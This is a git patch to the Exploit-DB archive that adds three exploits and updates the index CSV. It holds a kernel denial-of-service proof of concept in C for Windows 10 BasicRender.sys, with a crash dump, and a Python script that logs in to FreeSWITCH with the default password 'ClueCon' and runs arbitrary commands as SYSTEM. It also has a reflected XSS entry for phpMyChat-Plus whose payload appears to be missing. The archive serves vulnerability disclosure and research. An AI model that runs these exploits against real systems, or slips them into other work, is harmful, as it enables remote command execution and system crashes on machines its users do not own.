From e3e102da5b51a44e481eef95f0f0fbd8148c4cdd Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 21 Dec 2019 05:01:57 +0000 Subject: [PATCH] DB: 2019-12-21 4 changes to exploits/shellcodes Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC) FreeSWITCH 1.10.1 - Command Execution phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting --- exploits/hardware/webapps/47776.txt | 2 +- exploits/php/webapps/47798.txt | 17 ++++ exploits/windows/dos/47797.c | 115 ++++++++++++++++++++++++++++ exploits/windows/remote/47799.txt | 52 +++++++++++++ files_exploits.csv | 3 + 5 files changed, 188 insertions(+), 1 deletion(-) create mode 100644 exploits/php/webapps/47798.txt create mode 100644 exploits/windows/dos/47797.c create mode 100644 exploits/windows/remote/47799.txt diff --git a/exploits/hardware/webapps/47776.txt b/exploits/hardware/webapps/47776.txt index 2e690c58e..8a3e360d2 100644 --- a/exploits/hardware/webapps/47776.txt +++ b/exploits/hardware/webapps/47776.txt @@ -7,7 +7,7 @@ # Hardware Version: T1 # Firmware Version: 20.07 # Tested on: Windows 10 and Kali linux -# CVE: N/A +# CVE: CVE-2019-19742 Reproduction Steps: 1. Login to your wi-fi router gateway with admin credentials [i.e: http://192.168.0.1] diff --git a/exploits/php/webapps/47798.txt b/exploits/php/webapps/47798.txt new file mode 100644 index 000000000..9aa27638e --- /dev/null +++ b/exploits/php/webapps/47798.txt @@ -0,0 +1,17 @@ +# Exploit Title: phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting +# Date: 2019-12-19 +# Exploit Author: Chris Inzinga +# Vendor Homepage: http://ciprianmp.com/latest/ +# Download: https://sourceforge.net/projects/phpmychat/ +# Tested On: Linux & Mac +# Version: 1.98 +# CVE: CVE-2019-19908 + +Description: +The "pmc_username" parameter of pass_reset.php is vulnerable to reflected XSS + +Payload: +"> + +Vulnerable URL: +http://localhost/plus/pass_reset.php?L=english&pmc_username="> \ No newline at end of file diff --git a/exploits/windows/dos/47797.c b/exploits/windows/dos/47797.c new file mode 100644 index 000000000..5acf476d0 --- /dev/null +++ b/exploits/windows/dos/47797.c @@ -0,0 +1,115 @@ +# Exploit Title: Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC) +# Date: 2019-12-20 +# Exploit author: vportal +# Vendor homepage: http://www.microsoft.com +# Version: Windows 10 1803 x86 +# Tested on: Windows 10 1803 x86 +# CVE: N/A + +# A Null pointer deference exists in the WARPGPUCMDSYNC function of the +# BasicRender.sys driver. An unprivileged user can trigger the vulnerability +# to crash the system and deny the service to the rest of the users. + +*PoC:* + +#include +#include + +D3DKMT_CREATEDEVICE* device = NULL; +device = new D3DKMT_CREATEDEVICE(); + +D3DKMT_ENUMADAPTERS enumAdapter = { 0 }; +D3DKMTEnumAdapters(&enumAdapter); +device->hAdapter = enumAdapter.Adapters[1].hAdapter; +logger(log_counter, "EnumAdapter"); + +D3DKMTCreateDevice(device); + +D3DKMT_CREATECONTEXTVIRTUAL* contextVirtual = NULL; +contextVirtual = new D3DKMT_CREATECONTEXTVIRTUAL(); +memset(contextVirtual, 0, sizeof(D3DKMT_CREATECONTEXTVIRTUAL)); + +contextVirtual->hDevice = device->hDevice; + +char data[0x200] = { 0 }; +memset(data, 0xff, 0x200); + +contextVirtual->PrivateDriverDataSize = 0x200; +contextVirtual->pPrivateDriverData = data; + +contextVirtual->ClientHint = D3DKMT_CLIENTHINT_DX10; +contextVirtual->Flags.InitialData = 0x000001; +contextVirtual->Flags.NullRendering = 0x0; + +D3DKMT_SUBMITCOMMAND* submitCommand = NULL; +submitCommand = new D3DKMT_SUBMITCOMMAND(); + +submitCommand->BroadcastContext[0] = 0x40000240; + +for (int i = 0; i < 0x10; i++) + submitCommand->WrittenPrimaries[i] = 0x0; + +submitCommand->PresentHistoryToken = 0x100; +submitCommand->Commands = 0x004b39; +submitCommand->CommandLength = 0x00000d; +submitCommand->BroadcastContext[0] = contextVirtual->hContext; +submitCommand->BroadcastContextCount = 0x1; +submitCommand->Flags.PresentRedirected = 0x1; + +submitCommand->PrivateDriverDataSize = 0x130; + +char* PrivateData = NULL; +PrivateData = new char[submitCommand->PrivateDriverDataSize]; +memset(PrivateData, 0x00, submitCommand->PrivateDriverDataSize); + +*(DWORD*)(PrivateData + 0x118) = 0x434e5953; +*(DWORD*)(PrivateData + 0x11c) = 0x18; +*(DWORD*)(PrivateData + 0x120) = 0x000110; +*(DWORD*)(PrivateData + 0x124) = 0x000420; +*(DWORD*)(PrivateData + 0x128) = 0x0; +*(DWORD*)(PrivateData + 0x12c) = 0x000428; + +submitCommand->pPrivateDriverData = PrivateData; + +D3DKMTSubmitCommand(submitCommand); + + +-------------------------------------------------------------------------- +*Crash dump*: + +STACK_TEXT: +8afae92c 8fe82cb2 8afae958 fffffffd 0000048c +BasicRender!WARPGPUCMDSYNC::WARPGPUCMDSYNC+0xc +8afae94c 8fe8267d bb26afe8 00000000 bb26afe0 +BasicRender!WARPKMCONTEXT::SubmitVirtual+0x4a +8afae9a8 8fca6af5 91e05000 bb26afe0 93dfc000 +BasicRender!WarpKMSubmitCommandVirtual+0x87 +8afae9fc 8fc2a934 8afaea68 8afaeac0 92b19db6 +dxgkrnl!ADAPTER_RENDER::DdiSubmitCommandVirtual+0x115 +8afaea08 92b19db6 90114c30 8afaea68 b78da008 +dxgkrnl!ADAPTER_RENDER_DdiSubmitCommandVirtual+0x10 +8afaeac0 92b4ac94 93dfc000 cd6ee008 cc6d8860 +dxgmms2!VidSchiSendToExecutionQueue+0x526 +8afaeb90 92b764a9 00000000 945f5a80 00000000 +dxgmms2!VidSchiSubmitRenderVirtualCommand+0x534 +8afaebb8 81ee80bc 93dfc000 28e5f697 00000000 +dxgmms2!VidSchiWorkerThread+0x1a1 +8afaebf0 81fe952d 92b76308 93dfc000 00000000 nt!PspSystemThreadStartup+0x4a +8afaebfc 00000000 00000000 bbbbbbbb bbbbbbbb nt!KiThreadStartup+0x15 + +eax=8afae958 ebx=00000000 ecx=00000000 edx=00000000 *esi*=00000000 +edi=bb26afd8 +eip=8fe8386c esp=8afae920 ebp=8afae92c iopl=0 nv up ei pl zr na pe +nc +cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 +efl=00010246 +BasicRender!WARPGPUCMDSYNC::WARPGPUCMDSYNC+0xc: +8fe8386c c7061060e88f mov dword ptr [esi],offset +BasicRender!WARPGPUCMDSYNC::`vftable' (8fe86010) ds:0023:00000000=???????? +Resetting default scope + +-------------------------------------------------------------------------------- + +The vulnerability has only been tested in Windows 10 x86 1803. +CVSS Base Score: 5.5 +Credit: Victor Portal \ No newline at end of file diff --git a/exploits/windows/remote/47799.txt b/exploits/windows/remote/47799.txt new file mode 100644 index 000000000..147045d80 --- /dev/null +++ b/exploits/windows/remote/47799.txt @@ -0,0 +1,52 @@ +# Exploit Title: FreeSWITCH 1.10.1 - Command Execution +# Date: 2019-12-19 +# Exploit Author: 1F98D +# Vendor Homepage: https://freeswitch.com/ +# Software Link: https://files.freeswitch.org/windows/installer/x64/FreeSWITCH-1.10.1-Release-x64.msi +# Version: 1.10.1 +# Tested on: Windows 10 (x64) +# +# FreeSWITCH listens on port 8021 by default and will accept and run commands sent to +# it after authenticating. By default commands are not accepted from remote hosts. +# +# -- Example -- +# root@kali:~# ./freeswitch-exploit.py 192.168.1.100 whoami +# Authenticated +# Content-Type: api/response +# Content-Length: 20 +# +# nt authority\system +# + +#!/usr/bin/python3 + +from socket import * +import sys + +if len(sys.argv) != 3: + print('Missing arguments') + print('Usage: freeswitch-exploit.py ') + sys.exit(1) + +ADDRESS=sys.argv[1] +CMD=sys.argv[2] +PASSWORD='ClueCon' # default password for FreeSWITCH + +s=socket(AF_INET, SOCK_STREAM) +s.connect((ADDRESS, 8021)) + +response = s.recv(1024) +if b'auth/request' in response: + s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8')) + response = s.recv(1024) + if b'+OK accepted' in response: + print('Authenticated') + s.send(bytes('api system {}\n\n'.format(CMD), 'utf8')) + response = s.recv(8096).decode() + print(response) + else: + print('Authentication failed') + sys.exit(1) +else: + print('Not prompted for authentication, likely not vulnerable') + sys.exit(1) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index f816b0941..e48b40e8a 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6625,6 +6625,7 @@ id,file,description,date,author,type,platform,port 47786,exploits/windows/dos/47786.py,"XnView 2.49.1 - 'Research' Denial of Service (PoC)",2019-12-18,ZwX,dos,windows, 47791,exploits/macos/dos/47791.txt,"macOS 10.14.6 (18G87) - Kernel Use-After-Free due to Race Condition in wait_for_namespace_event()",2019-12-18,"Google Security Research",dos,macos, 47794,exploits/windows/dos/47794.py,"FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH)",2019-12-19,"Chris Inzinga",dos,windows, +47797,exploits/windows/dos/47797.c,"Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)",2019-12-20,vportal,dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -17868,6 +17869,7 @@ id,file,description,date,author,type,platform,port 47700,exploits/multiple/remote/47700.rb,"Pulse Secure VPN - Arbitrary Command Execution (Metasploit)",2019-11-20,Metasploit,remote,multiple, 47750,exploits/windows/remote/47750.py,"Integard Pro NoJs 2.2.0.9026 - Remote Buffer Overflow",2019-12-06,purpl3f0xsecur1ty,remote,windows,18881 47792,exploits/linux/remote/47792.rb,"OpenMRS - Java Deserialization RCE (Metasploit)",2019-12-18,Metasploit,remote,linux,8081 +47799,exploits/windows/remote/47799.txt,"FreeSWITCH 1.10.1 - Command Execution",2019-12-20,1F98D,remote,windows, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -42103,3 +42105,4 @@ id,file,description,date,author,type,platform,port 47789,exploits/asp/webapps/47789.txt,"Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting",2019-12-18,"Harshit Shukla",webapps,asp, 47793,exploits/aspx/webapps/47793.txt,"Telerik UI - Remote Code Execution via Insecure Deserialization",2019-12-18,"Bishop Fox",webapps,aspx, 47796,exploits/hardware/webapps/47796.txt,"Deutsche Bahn Ticket Vending Machine Local Kiosk - Privilege Escalation",2019-12-19,Vulnerability-Lab,webapps,hardware, +47798,exploits/php/webapps/47798.txt,"phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting",2019-12-20,"Chris Inzinga",webapps,php,